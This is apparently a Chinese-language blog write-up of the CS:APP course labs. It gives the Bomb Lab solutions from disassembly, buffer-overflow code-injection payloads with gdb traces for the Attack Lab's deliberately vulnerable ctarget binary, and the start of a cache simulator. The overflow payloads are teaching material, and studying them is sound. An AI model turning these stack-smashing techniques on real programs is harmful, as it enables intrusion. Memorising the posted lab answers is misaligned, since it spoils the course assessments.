ZhangJie Software Development Engineer

CSAPP LAB

2023-01-07
ZhangJie
LAB

CSAPP LAB。

Lab2-bomb

BombLab提供给我们的文件非常简单,只有一个编译不了的C文件bomb.c,和一个目标代码文件bomb。当运行bomb文件时,它会要求输入6个字符串,如果其中的任何一句是错的,炸弹就会“爆炸”。我们必须利用反汇编工具逆向分析这个文件,并找到这6个字符串,从而“拆除”炸弹。

首先对bomb进行反汇编:

objdump -d bomb > bomb.s
objdump -t bomb > bomb.t

phase_1

0000000000400ee0 <phase_1>:
  400ee0:	48 83 ec 08          	sub    $0x8,%rsp
  400ee4:	be 00 24 40 00       	mov    $0x402400,%esi
  400ee9:	e8 4a 04 00 00       	callq  401338 <strings_not_equal>
  400eee:	85 c0                	test   %eax,%eax
  400ef0:	74 05                	je     400ef7 <phase_1+0x17>
  400ef2:	e8 43 05 00 00       	callq  40143a <explode_bomb>
  400ef7:	48 83 c4 08          	add    $0x8,%rsp
  400efb:	c3                   	retq   

这段代码先把一个值,更准确地说,是字符串的地址(0x402400)放到%esi里,之后调用一个叫”strings_not_equal”的函数;最后判断这个函数的返回值:等于零,通过;不等于零,调用”explode_bomb”把炸弹炸掉(或许你会问%edi在哪里?其实%edi就是我们输入的字符串的地址)。

现在让我们考虑一下strings_not_equal这个函数的两个参数。%rdi中的值,就是我们输入的字符串的地址;%rsi中的值是后面传进去的0x402400。那么0x402400指向的是什么字符串呢?

(gdb) x/s 0x402400
0x402400:       "Border relations with Canada have never been better."
$ ./bomb
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Border relations with Canada have never been better.
Phase 1 defused. How about the next one?
...

phase_2

0000000000400efc <phase_2>:
  400efc:	55                   	push   %rbp
  400efd:	53                   	push   %rbx
  400efe:	48 83 ec 28          	sub    $0x28,%rsp
  400f02:	48 89 e6             	mov    %rsp,%rsi
  400f05:	e8 52 05 00 00       	callq  40145c <read_six_numbers>
  400f0a:	83 3c 24 01          	cmpl   $0x1,(%rsp)
  400f0e:	74 20                	je     400f30 <phase_2+0x34>
  400f10:	e8 25 05 00 00       	callq  40143a <explode_bomb>
  400f15:	eb 19                	jmp    400f30 <phase_2+0x34>
  400f17:	8b 43 fc             	mov    -0x4(%rbx),%eax
  400f1a:	01 c0                	add    %eax,%eax
  400f1c:	39 03                	cmp    %eax,(%rbx)
  400f1e:	74 05                	je     400f25 <phase_2+0x29>
  400f20:	e8 15 05 00 00       	callq  40143a <explode_bomb>
  400f25:	48 83 c3 04          	add    $0x4,%rbx
  400f29:	48 39 eb             	cmp    %rbp,%rbx
  400f2c:	75 e9                	jne    400f17 <phase_2+0x1b>
  400f2e:	eb 0c                	jmp    400f3c <phase_2+0x40>
  400f30:	48 8d 5c 24 04       	lea    0x4(%rsp),%rbx
  400f35:	48 8d 6c 24 18       	lea    0x18(%rsp),%rbp
  400f3a:	eb db                	jmp    400f17 <phase_2+0x1b>
  400f3c:	48 83 c4 28          	add    $0x28,%rsp
  400f40:	5b                   	pop    %rbx
  400f41:	5d                   	pop    %rbp
  400f42:	c3                   	retq   

这段汇编先“读入“六个数(0x400f05:read_six_numbers)。从哪里“读入”呢?当然不是stdin。我们注意到,和上面那个Phase一样,%rdi并没有在调用这个函数之前出现。也就是说,phase_2函数的第一个参数,被原封不动地传到了read_six_numbers的第一个参数。那么%rsi,也就是第二个参数,代表的是什么呢?注意看这两行汇编:

  400efe:	48 83 ec 28          	sub    $0x28,%rsp
  400f02:	48 89 e6             	mov    %rsp,%rsi

%rsi里放的是地址!结合read_six_numbers第一个参数的含义(恰好是我们输入的字符串)大胆猜想,我们可以知道:1. read_six_numbers从我们自己输进去的字符串里”read”; 2. %rsi在源代码里应该是个指针,这个指针指向一个数组的开头,而这个数组就是放read_six_numbers从字符串里抽出的六个数用的。不过我们还是来看一看read_six_numbers具体是怎么实现的:

000000000040145c <read_six_numbers>:
  40145c:	48 83 ec 18          	sub    $0x18,%rsp
  401460:	48 89 f2             	mov    %rsi,%rdx
  401463:	48 8d 4e 04          	lea    0x4(%rsi),%rcx
  401467:	48 8d 46 14          	lea    0x14(%rsi),%rax
  40146b:	48 89 44 24 08       	mov    %rax,0x8(%rsp)
  401470:	48 8d 46 10          	lea    0x10(%rsi),%rax
  401474:	48 89 04 24          	mov    %rax,(%rsp)
  401478:	4c 8d 4e 0c          	lea    0xc(%rsi),%r9
  40147c:	4c 8d 46 08          	lea    0x8(%rsi),%r8
  401480:	be c3 25 40 00       	mov    $0x4025c3,%esi
  401485:	b8 00 00 00 00       	mov    $0x0,%eax
  40148a:	e8 61 f7 ff ff       	callq  400bf0 <__isoc99_sscanf@plt>
  40148f:	83 f8 05             	cmp    $0x5,%eax
  401492:	7f 05                	jg     401499 <read_six_numbers+0x3d>
  401494:	e8 a1 ff ff ff       	callq  40143a <explode_bomb>
  401499:	48 83 c4 18          	add    $0x18,%rsp
  40149d:	c3                   	retq   

%rsi是什么?我们猜是数组首个元素的地址。0x4(%rsi)是什么?我们猜是数组第二个元素的地址。那么0x14(%rsi)、0x10(%rsi)等等呢?同理。以上这些都被read_six_numbers做成了sscanf的末几个参数(不是”scanf”!多了一个”s”!!!)(注意到了吗?有几个地址,因为寄存器放不下,被送到栈里面了)。sscanf的第一个参数,从汇编来看,是read_six_numbers的第一个参数,也就是我们输入的字符串;而第二个参数是存储在0x4025c3的字符串。和上面一样,我们来看一看0x4025c3里有什么。

(gdb) x/s 0x4025c3
0x4025c3:       "%d %d %d %d %d %d"

事实上,sscanf的作用与scanf类似,只不过scanf从sdtin中读取数据,sscanf从它的第一个参数中读取数据。read_six_numbers就是借助sscanf,把我们输入的字符串中的数抽出来,放到一个数组里。我们的猜测是对的。 现在,我们知道了phase_2的要求是输入6个特定的数,数与数之间用空格隔开。那么这六个数又是什么呢?我们接着往下看。

  ...
  400f0a:	83 3c 24 01          	cmpl   $0x1,(%rsp)
  400f0e:	74 20                	je     400f30 <phase_2+0x34>
  400f10:	e8 25 05 00 00       	callq  40143a <explode_bomb>
  400f15:	eb 19                	jmp    400f30 <phase_2+0x34>
  ...

我们已经知道了,%rsp里放的就是数组第一个元素的地址。所以说,很显然,这段汇编在判断我们输入的六个数,第一个数是不是等于一。判断了之后就跳到0x400f30:

  ...
  400f30:	48 8d 5c 24 04       	lea    0x4(%rsp),%rbx
  400f35:	48 8d 6c 24 18       	lea    0x18(%rsp),%rbp
  400f3a:	eb db                	jmp    400f17 <phase_2+0x1b>
  ...

嗯,这三行汇编把第二个数(int是四个字节)的地址放进%rbx里,把最后一个数下一个字节的地址放进%rbp里(是判断循环终止条件用的),之后跳到0x400f17。

  ...
  400f17:	8b 43 fc             	mov    -0x4(%rbx),%eax
  400f1a:	01 c0                	add    %eax,%eax
  400f1c:	39 03                	cmp    %eax,(%rbx)
  400f1e:	74 05                	je     400f25 <phase_2+0x29>
  400f20:	e8 15 05 00 00       	callq  40143a <explode_bomb>
  400f25:	48 83 c3 04          	add    $0x4,%rbx
  400f29:	48 39 eb             	cmp    %rbp,%rbx
  400f2c:	75 e9                	jne    400f17 <phase_2+0x1b>
  ...

从0x400f17这里,程序就开始循环处理我们输进去的六个数了。首先,程序把%rbx指向的数的前一个放到%eax里,之后让它翻倍。翻倍之后再检查%eax里的值是不是和%rbx当前指向的数相同。

如果相同呢,就跳到0x400f25;如果不相同,就调用explode_bomb引爆炸弹。看来,这好像是个等比数列!1为首项,2为公比!这里程序把%rbx里的指针后移四字节,再判断指针是否到达了数组末尾。所以,要过这个phase,只要输入以一为首项,二为公比的等比数列前六项就行了。

Phase 1 defused. How about the next one?
1 2 4 8 16 32
That's number 2.  Keep going!

phase_3

0000000000400f43 <phase_3>:
  400f43:	48 83 ec 18          	sub    $0x18,%rsp
  400f47:	48 8d 4c 24 0c       	lea    0xc(%rsp),%rcx
  400f4c:	48 8d 54 24 08       	lea    0x8(%rsp),%rdx
  400f51:	be cf 25 40 00       	mov    $0x4025cf,%esi
  400f56:	b8 00 00 00 00       	mov    $0x0,%eax
  400f5b:	e8 90 fc ff ff       	callq  400bf0 <__isoc99_sscanf@plt>
  400f60:	83 f8 01             	cmp    $0x1,%eax
  400f63:	7f 05                	jg     400f6a <phase_3+0x27>
  400f65:	e8 d0 04 00 00       	callq  40143a <explode_bomb>
  400f6a:	83 7c 24 08 07       	cmpl   $0x7,0x8(%rsp)
  400f6f:	77 3c                	ja     400fad <phase_3+0x6a>
  400f71:	8b 44 24 08          	mov    0x8(%rsp),%eax
  400f75:	ff 24 c5 70 24 40 00 	jmpq   *0x402470(,%rax,8)
  400f7c:	b8 cf 00 00 00       	mov    $0xcf,%eax
  400f81:	eb 3b                	jmp    400fbe <phase_3+0x7b>
  400f83:	b8 c3 02 00 00       	mov    $0x2c3,%eax
  400f88:	eb 34                	jmp    400fbe <phase_3+0x7b>
  400f8a:	b8 00 01 00 00       	mov    $0x100,%eax
  400f8f:	eb 2d                	jmp    400fbe <phase_3+0x7b>
  400f91:	b8 85 01 00 00       	mov    $0x185,%eax
  400f96:	eb 26                	jmp    400fbe <phase_3+0x7b>
  400f98:	b8 ce 00 00 00       	mov    $0xce,%eax
  400f9d:	eb 1f                	jmp    400fbe <phase_3+0x7b>
  400f9f:	b8 aa 02 00 00       	mov    $0x2aa,%eax
  400fa4:	eb 18                	jmp    400fbe <phase_3+0x7b>
  400fa6:	b8 47 01 00 00       	mov    $0x147,%eax
  400fab:	eb 11                	jmp    400fbe <phase_3+0x7b>
  400fad:	e8 88 04 00 00       	callq  40143a <explode_bomb>
  400fb2:	b8 00 00 00 00       	mov    $0x0,%eax
  400fb7:	eb 05                	jmp    400fbe <phase_3+0x7b>
  400fb9:	b8 37 01 00 00       	mov    $0x137,%eax
  400fbe:	3b 44 24 0c          	cmp    0xc(%rsp),%eax
  400fc2:	74 05                	je     400fc9 <phase_3+0x86>
  400fc4:	e8 71 04 00 00       	callq  40143a <explode_bomb>
  400fc9:	48 83 c4 18          	add    $0x18,%rsp
  400fcd:	c3                   	retq   

这个phase考的是switch语句的汇编表示。 好啦,先看题吧。phase_3开头和上面那个read_six_numbers很像,也调用了sscanf,从我们输入的字符串里提取数字。只不过这次只有两个数,第一个放在0x8(%rsp)那里,第二个放在0xc(%rsp)那里。 仔细看汇编。我们发现,0x8(%rsp)和0xc(%rsp)这两个值,只在两个地方出现过。对于0x8(%rsp), 这个地方是:

  400f71:	8b 44 24 08          	mov    0x8(%rsp),%eax
  400f75:	ff 24 c5 70 24 40 00 	jmpq   *0x402470(,%rax,8)

而对于0xc(%rsp), 这个地方是:

  400fbe:	3b 44 24 0c          	cmp    0xc(%rsp),%eax
  400fc2:	74 05                	je     400fc9 <phase_3+0x86>
  400fc4:	e8 71 04 00 00       	callq  40143a <explode_bomb>

在0x400f75这一行,代码究竟要跳转到哪里呢?应该是0x402470这个地址中储存的值(星号解引用,和指针一样),和8乘%rax里的值加在一起组成的地址。%rax里的值我们知道,就是我们输入的第一个数;

我们需要先输入两个数,第一个指示应该用哪个case;第二个用来和这个case放到%eax里的数比较。所以,这个phase的答案也不是唯一的啦。

要求跳到内存0x402470(,%rax,8)里面存的位置。rax指向的内存此时存的就是第1个数,我们只知道这个数时小于等于7的,这里随便假设其为 1 试试!

0x402470 + 8 * 1 = 0x402478

那么接下来就要跳到内存0x402478中的地址。

(gdb) x/wx 0x402478
0x402478:       0x00400fb9
...
That's number 2.  Keep going!
1 311
Halfway there!

phase_4

000000000040100c <phase_4>:
  40100c:	48 83 ec 18          	sub    $0x18,%rsp
  401010:	48 8d 4c 24 0c       	lea    0xc(%rsp),%rcx
  401015:	48 8d 54 24 08       	lea    0x8(%rsp),%rdx
  40101a:	be cf 25 40 00       	mov    $0x4025cf,%esi
  40101f:	b8 00 00 00 00       	mov    $0x0,%eax
  401024:	e8 c7 fb ff ff       	callq  400bf0 <__isoc99_sscanf@plt>
  401029:	83 f8 02             	cmp    $0x2,%eax
  40102c:	75 07                	jne    401035 <phase_4+0x29>
  40102e:	83 7c 24 08 0e       	cmpl   $0xe,0x8(%rsp)
  401033:	76 05                	jbe    40103a <phase_4+0x2e>
  401035:	e8 00 04 00 00       	callq  40143a <explode_bomb>
  40103a:	ba 0e 00 00 00       	mov    $0xe,%edx
  40103f:	be 00 00 00 00       	mov    $0x0,%esi
  401044:	8b 7c 24 08          	mov    0x8(%rsp),%edi
  401048:	e8 81 ff ff ff       	callq  400fce <func4>
  40104d:	85 c0                	test   %eax,%eax
  40104f:	75 07                	jne    401058 <phase_4+0x4c>
  401051:	83 7c 24 0c 00       	cmpl   $0x0,0xc(%rsp)
  401056:	74 05                	je     40105d <phase_4+0x51>
  401058:	e8 dd 03 00 00       	callq  40143a <explode_bomb>
  40105d:	48 83 c4 18          	add    $0x18,%rsp
  401061:	c3                   	retq   
0000000000400fce <func4>:
  400fce:	48 83 ec 08          	sub    $0x8,%rsp
  400fd2:	89 d0                	mov    %edx,%eax
  400fd4:	29 f0                	sub    %esi,%eax
  400fd6:	89 c1                	mov    %eax,%ecx
  400fd8:	c1 e9 1f             	shr    $0x1f,%ecx
  400fdb:	01 c8                	add    %ecx,%eax
  400fdd:	d1 f8                	sar    %eax
  400fdf:	8d 0c 30             	lea    (%rax,%rsi,1),%ecx
  400fe2:	39 f9                	cmp    %edi,%ecx
  400fe4:	7e 0c                	jle    400ff2 <func4+0x24>
  400fe6:	8d 51 ff             	lea    -0x1(%rcx),%edx
  400fe9:	e8 e0 ff ff ff       	callq  400fce <func4>
  400fee:	01 c0                	add    %eax,%eax
  400ff0:	eb 15                	jmp    401007 <func4+0x39>
  400ff2:	b8 00 00 00 00       	mov    $0x0,%eax
  400ff7:	39 f9                	cmp    %edi,%ecx
  400ff9:	7d 0c                	jge    401007 <func4+0x39>
  400ffb:	8d 71 01             	lea    0x1(%rcx),%esi
  400ffe:	e8 cb ff ff ff       	callq  400fce <func4>
  401003:	8d 44 00 01          	lea    0x1(%rax,%rax,1),%eax
  401007:	48 83 c4 08          	add    $0x8,%rsp
  40100b:	c3                   	retq   

phase_4和上面phase_3的开头是类似的,也是让我们输入两个数,并且要求第一个数不大于14,第二个数等于0。之后程序调用func4。func4第一个参数就是我们输入的第一个数,第二个、第三个参数都是常数,是0和14(%edx里的那个)。func4返回之后,程序判断func4的返回值,等于零就通过,否则引爆炸弹。

int func4(int edi, int esi, int edx)
{
    int eax = edx;
    eax -= esi;
    int ecx = eax;
    ecx >>= 31;
    eax += ecx;
    eax >>= 1;
    ecx = eax + esi;
    if (ecx > edi)
    {
        edx = ecx - 1;
        eax = func4(edi, esi, edx);
        eax *= 2;
        return eax;
    }
    else
    {
        eax = 0;
        if(ecx < edi)
        {
            esi = ecx + 1;
            eax = func4(edi, esi, edx);
            eax = eax * 2 + 1;
            return eax;
        }
        else
            return eax;
    }
}
int func4 (int edi, int esi, int edx)
{
    eax = edx - esi;
    eax = (eax + (eax >> 31)) >> 1;
    ecx = eax + exi;
    if(edi < ecx) 
        return  2 * func4(edi, esi, edx - 1);
    else if (edi > ecx)
        return  2 * func4(edi, esi + 1, edx) + 1;
    else
        return  0;
}
int func4(int edi, int esi, int edx)
{
    int eax = edx - esi;
    if (eax < 0)
      eax -= 1;
    eax /= 2;

    int ecx = eax + esi;
    if (ecx > edi)
        return func4(edi, esi, ecx - 1) * 2;
    else if (ecx < edi)
        return func4(edi, ecx + 1, edx) * 2 + 1;
    else
        return 0;
}

既然edx是14,esi是0,那么开头三行代码执行完之后ecx就是7。 什么情况下func4会返回零呢?当然是ecx等于edi的情况。这样我们就可以确定,edi是7。

Halfway there!
7 0
So you got that one.  Try this one.

参考资料

  • https://blog.csdn.net/aufefgavo/article/details/119697258

Lab3-attack

target1里的两个程序,ctraget和rtarget,都有缓冲区溢出的bug。实验要求我们做的,是利用这些bug,让程序通过缓冲区溢出,执行我们想执行的代码。

下载的文件夹里,ctarget是做代码注入攻击 (code-injection attacks) 用的。rtarget,还有后面的cookie.txt、hex2raw、farm.c都和后面的ROP攻击(return-oriented-programming, ROP)有关。

writeup里有getbuf()的源码。我们利用的缓冲区的bug,就是在这里出现的。我们从Type string那里输进一个字符串。如果字符串是精心设计好的,正好能把栈里原本的返回地址,用你设计的地址冲掉(这个实验里是touch1、touch2、touch3的地址;如果做到后面,就是gadget的地址)(书上练习3.46),让target执行你想执行的内容,我们的目的就达到了。

jason@jason-virtual-machine:~/csapplab/attacklab/target1$ ./ctarget 
FAILED: Initialization error: Running on an illegal host [jason-virtual-machine]

加上-q参数,不发送结果到评分服务器。

jason@jason-virtual-machine:~/csapplab/attacklab/target1$ ./ctarget -h
Usage: [-hq] ./ctarget -i <infile> 
  -h          Print help information
  -q          Don't submit result to server
  -i <infile> Input file

jason@jason-virtual-machine:~/csapplab/attacklab/target1$ ./ctarget -q
Cookie: 0x59b997fa
...

Phase 1

首先看一看getbuf()的汇编代码:

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	retq   
  4017be:	90                   	nop
  4017bf:	90                   	nop

我们知道,call 0x4017a8(就是调用getbuf())这个指令会把ret指令要返回到的地址压进栈,然后才会跳转到0x4017a8这个地址执行getbuf()的代码。而getbuf()被调用之后,执行的第一行汇编是干什么的?没错,就是将栈指针向栈顶移动40(0x28,敲黑板,十六进制!)个字节。而这40个字节里放的是什么呢?有一部分就是我们敲进去的字符串。也就是说,如果我们敲进去的字符串足够长,比这40个字节还长,它的最后几个字符,就完全可以冲掉原本的返回地址!如果这最后几个字符又恰好是touch1的地址,那么等执行到0x4017bd,也就是getbuf()里的ret指令时,ret指令会直接返回到touch1的地址!

可以先把字节码写在一个txt里,再借助下载的hex2raw程序,把它直接转换成相应的十六进制字节码。实验说明的附录里有使用方法,其实也可以用各种16进制文本编辑器帮助转换:

c1.txt

31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38 C0 17 40 00 00 00 00 00

从第三行的C0开始一直到这一行结束都是touch1的地址,让八字节的地址准确地覆盖掉原来存在栈中的地址。

$ ./hex2raw -i c1.txt > c1
$ ./ctarget -q < c1
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:1:31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38 C0 17 40 00 00 00 00 00 

Phase 2

void touch2(unsigned val)
{
    vlevel = 2; /* Part of validation protocol */ 
    if (val == cookie) {
        printf("Touch2!: You called touch2(0x%.8x)\n", val);
        validate(2);
    } else {
        printf("Misfire: You called touch2(0x%.8x)\n", val);
        fail(2);
    }
    exit(0);
}

Your task is to get CTARGET to execute the code for touch2 rather than returning to test.

Some Advice:

• You will want to position a byte representation of the address of your injected code in such a way that
ret instruction at the end of the code for getbuf will transfer control to it.

• Recall that the first argument to a function is passed in register %rdi. 

• Your injected code should set the register to your cookie, and then use a ret instruction to transfer
control to the first instruction in touch2. 

• Do not attempt to use jmp or call instructions in your exploit code. The encodings of destination
addresses for these instructions are difficult to formulate. Use ret instructions for all transfers of
control, even when you are not returning from a call.

• See the discussion in Appendix B on how to use tools to generate the byte-level representations of
instruction sequences.

在字符串里写一段真正的汇编,之后利用ret指令直接跳转过去。

不是有“栈随机化”吗?每次运行程序,字符串开头的地址都不一样,怎么跳转?即使跳过去了,可执行代码的区域也是被严格限制的……放字符串的内存区域,即使放了代码,也没办法执行呀……

其实,为了方便我们做实验,程序的作者已经帮我们把这些限制机制取消掉了,也就是说,每次执行,字符串的地址都是一致的,而且,即使是字符串里包含的代码也可以随便跑……放心做好了……

touch2函数有一个参数,是这个实验的cookie值,我们要做的就是通过注入的那一段汇编,把cookie加载到rdi寄存器里,之后”call touch2”。

首先我们需要确定我们应该跳到哪个地址去。来,打开GDB,找到getbuf()的地址,在合适的位置打上断点:

$ gdb ./ctarget -q
Reading symbols from ./ctarget...
(gdb) b *0x4017ac
Breakpoint 1 at 0x4017ac: file buf.c, line 14.

之后输入 “r -q” 运行程序。程序会在运行到0x4017ac的时候暂停。我们需要跳转到的地址,就是包含在栈指针中的地址。输入”p $rsp”:

(gdb) r -q
Starting program: /home/jason/Desktop/CSAPP/csapplab/attacklab/target1/ctarget -q
Cookie: 0x59b997fa

Breakpoint 1, getbuf () at buf.c:14
14      buf.c: No such file or directory.
(gdb) p $rsp
$1 = (void *) 0x5561dc78

可以看到%rsp中的地址是0x5561dc78对不对。这个地址就是我们注入的字符串第一个字符的地址。

好了,我们已经确定了该往哪里跳转。现在该写汇编代码了。

c2.s:

movq $0x59b997fa, %rdi
pushq $0x4017ec
retq

mov指令把cookie值存到%rdi里做成函数的参数;push指令做了call指令的一部分工作,把touch2的地址(0x4017ec)推入栈;ret指令模拟返回操作。

按照附录B的说明,把这些汇编转换成字节码

$ gcc -c c2.s
$ objdump -d c2.o > c2.d

得到c2.d:

c2.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
   0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
   7:	68 ec 17 40 00       	pushq  $0x4017ec
   c:	c3                   	retq   

再把Phase 1稍加修改:

c2.txt:

48 c7 c7 fa 97 b9 59 68 ec 17 40 00 c3 36 37 38
31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38 78 dc 61 55 00 00 00 00

前13字节的内容是上面那些汇编对应的字节码, 最后8字节内容是我们用gdb看到的字符串的地址~我们把这些东西放到c2文件里就可以执行啦。

$ ./hex2raw -i c2.txt > c2
jason@jason-virtual-machine:~/Desktop/CSAPP/csapplab/attacklab/target1$ ./ctarget -q < c2
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 36 37 38 31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38 78 DC 61 55 00 00 00 00 

Phase 3

cookie 0x59b997fa作为字符串转换为ASCII为:35 39 62 39 39 37 66 61

c3.s:

mov $0x59b997fa, %rdi
pushq $0x4018fa
retq

c3.d:

Disassembly of section .text:

0000000000000000 <.text>:
   0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
   7:	68 fa 18 40 00       	pushq  $0x4018fa
   c:	c3                   	retq   

c3.txt:

48 c7 c7 85 dc 61 55 68 fa 18 40 00 c3 35 39 62
39 39 37 66 61 36 37 38 31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38 78 dc 61 55 00 00 00 00

“48 c7 c7”表示这条指令会把常数移动到%rdi中,这三个字节后面跟着的四个字节就是要放到%rdi的常数。

注入字符串的起始地址为0x5561dc78,加上13(汇编指令字节长度)得到0x5561dc85。

$ gdb ./ctarget -q
Reading symbols from ./ctarget...
(gdb) b *0x4018fa
Breakpoint 1 at 0x4018fa: file visible.c, line 71.
(gdb) r -q < c3
Starting program: /home/jason/csapp/csapplab/attacklab/target1/ctarget -q < c3
Cookie: 0x59b997fa

Breakpoint 1, touch3 (sval=0x5561dc85 "59b997fa6781234567812345678\372\030@") at visible.c:71
71      visible.c: No such file or directory.

jason@jason-virtual-machine:~/csapp/csapplab/attacklab/target1$ gdb ./ctarget -q
Reading symbols from ./ctarget...
(gdb) b *0x4018fa
Breakpoint 1 at 0x4018fa: file visible.c, line 71.
(gdb) b *0x401916
Breakpoint 2 at 0x401916: file visible.c, line 73.
(gdb) r -q < c3
Starting program: /home/jason/csapp/csapplab/attacklab/target1/ctarget -q < c3
Cookie: 0x59b997fa

Breakpoint 1, touch3 (sval=0x5561dc85 "59b997fa6781234567812345678\372\030@") at visible.c:71
71      visible.c: No such file or directory.
(gdb) x /s $rdi
0x5561dc85:     "59b997fa6781234567812345678\372\030@"
(gdb) 

当程序运行到第一个断点时,上面gdb输出的前六行对应我们注入的字符串的前三行。

Starting program: /home/jason/csapp/csapplab/attacklab/target1/ctarget -q < c3
Cookie: 0x59b997fa

Breakpoint 1, touch3 (sval=0x5561dc85 "59b997fa6781234567812345678\372\030@") at visible.c:71
71      visible.c: No such file or directory.
(gdb) x /64bx 0x5561dc78
0x5561dc78:     0x48    0xc7    0xc7    0x85    0xdc    0x61    0x55    0x68
0x5561dc80:     0xfa    0x18    0x40    0x00    0xc3    0x35    0x39    0x62
0x5561dc88:     0x39    0x39    0x37    0x66    0x61    0x36    0x37    0x38
0x5561dc90:     0x31    0x32    0x33    0x34    0x35    0x36    0x37    0x38
0x5561dc98:     0x31    0x32    0x33    0x34    0x35    0x36    0x37    0x38
0x5561dca0:     0xfa    0x18    0x40    0x00    0x00    0x00    0x00    0x00
0x5561dca8:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x5561dcb0:     0x24    0x1f    0x40    0x00    0x00    0x00    0x00    0x00
(gdb) 

执行完hexmatch之后,栈里保存的值就面目全非了!问题一定出在hexmatch里。

...
(gdb) c
Continuing.

Breakpoint 2, 0x0000000000401916 in touch3 (sval=0x5561dc85 "") at visible.c:73
73      in visible.c
(gdb) x  /64bx 0x5561dc78
0x5561dc78:     0x00    0x0f    0x78    0x14    0xcb    0x7f    0x28    0x2f
0x5561dc80:     0x85    0xdc    0x61    0x55    0x00    0x00    0x00    0x00
0x5561dc88:     0xe8    0x5f    0x68    0x55    0x00    0x00    0x00    0x00
0x5561dc90:     0x02    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x5561dc98:     0x16    0x19    0x40    0x00    0x00    0x00    0x00    0x00
0x5561dca0:     0x00    0x60    0x58    0x55    0x00    0x00    0x00    0x00
0x5561dca8:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x5561dcb0:     0x24    0x1f    0x40    0x00    0x00    0x00    0x00    0x00
(gdb) 

hexmatch的汇编代码中,注意到0x401850那一行的内容了吗?这一行把一个数的补码加到了栈指针上!实际上相当于把%rsp减掉了一个值!这样一来,问题就解决了——原来hexmatch把栈指针下移,之后又在栈上进行了一些操作,把我们先前注入的字符串覆盖掉了。这样,只要我们把字符串放在栈指针原来位置的“上面”,问题就解决了。

“48 C7 C7”后面的”5561dca8”正好是”5561dc78”(”48”所在的地址)加上十进制的48,也就是后面”35 39 62…”的地址。而%rsp里的值只能是往下走的(字符串开头对应的地址小),所以这样能保证作为参数的cookie值不会被覆盖。

When functions hexmatch and strncmp are called, they push data onto the stack, overwriting portions of memory that held the buffer used by getbuf. As a result, you will need to be careful where you place the string representation of your cookie.

c3.txt

48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3 00 00 00
00 00 00 00 00 36 37 38 31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38 78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61
$ ./hex2raw -i  c3.txt  > c3
jason@jason-virtual-machine:~/csapp/csapplab/attacklab/target1$ ./ctarget -q < c3
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 36 37 38 31 32 33 34 35 36 37 38 31 32 33 34 35 36 37 38 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 

参考资料

  • https://blog.csdn.net/aufefgavo/article/details/119248852

Lab5-cachelab

Part A:

  • csim.c
#include <stdio.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#include "cachelab.h"

typedef __uint64_t uint64_t;

enum {
    kHit = 0,
    kMiss,
    kEvication,
};

#define TRUE 1
#define FALSE 0

int verbose = 0, s = 0, E = 0, b = 0, S = 0, B = 0;
FILE* traceFile = NULL;

uint64_t curTimeStamp = 0;

typedef struct {
    uint64_t tag;
    uint64_t timeStamp;
} CacheLine;

typedef CacheLine* CacheSet;
typedef CacheSet* Cache;

Cache cache;

typedef struct {
    int hit;
    int miss;
    int eviction;
} Result;

Result result = {0, 0, 0};

// 打印帮助信息
void printUsage();
int getArguments(int argc, char** argv);

void initCache();
void release();
void getCache(uint64_t tag, int setIndex);

int main(int argc, char** argv)
{
    int ret = getArguments(argc, argv);
    if (ret == FALSE) {
        return -1;
    }

    initCache();

    char operator;
    uint64_t address;
    int size;

    int isFist=TRUE;

    while (fscanf(traceFile, " %c %lx,%d\n", &operator, &address, &size) == 3)
    {
        if (operator == 'I')
            continue;

        int setIndex = (address >> b) % (1 << s);
        uint64_t tag = address >> (b + s);

        if (verbose)
        {
            if (!isFist) {
                printf("\n");
            }
            isFist = FALSE;
            fprintf(stdout, "%c %lx,%d ", operator, address, size);
        }

        if (operator == 'L' || operator == 'S') {
            getCache(tag, setIndex);
        }
        else if (operator == 'M') {
            getCache(tag, setIndex);
            getCache(tag, setIndex);
        }
    }

    if (verbose) {
        printf("\n");
    }

    release();
    
    printSummary(result.hit, result.miss, result.eviction);

    return 0;
}

void printUsage()
{
    printf("Usage: ./csim-ref [-hv] -s <num> -E <num> -b <num> -t <file>\n");
    printf("Options:\n");
    printf("  -h         Print this help message.\n");
    printf("  -v         Optional verbose flag.\n");
